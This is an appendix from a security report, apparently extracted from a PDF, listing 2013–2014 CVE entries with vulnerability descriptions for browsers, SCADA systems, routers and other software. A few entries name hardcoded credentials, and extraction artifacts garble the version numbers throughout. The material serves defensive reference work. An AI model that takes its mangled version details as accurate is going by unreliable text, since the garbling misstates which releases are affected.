CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
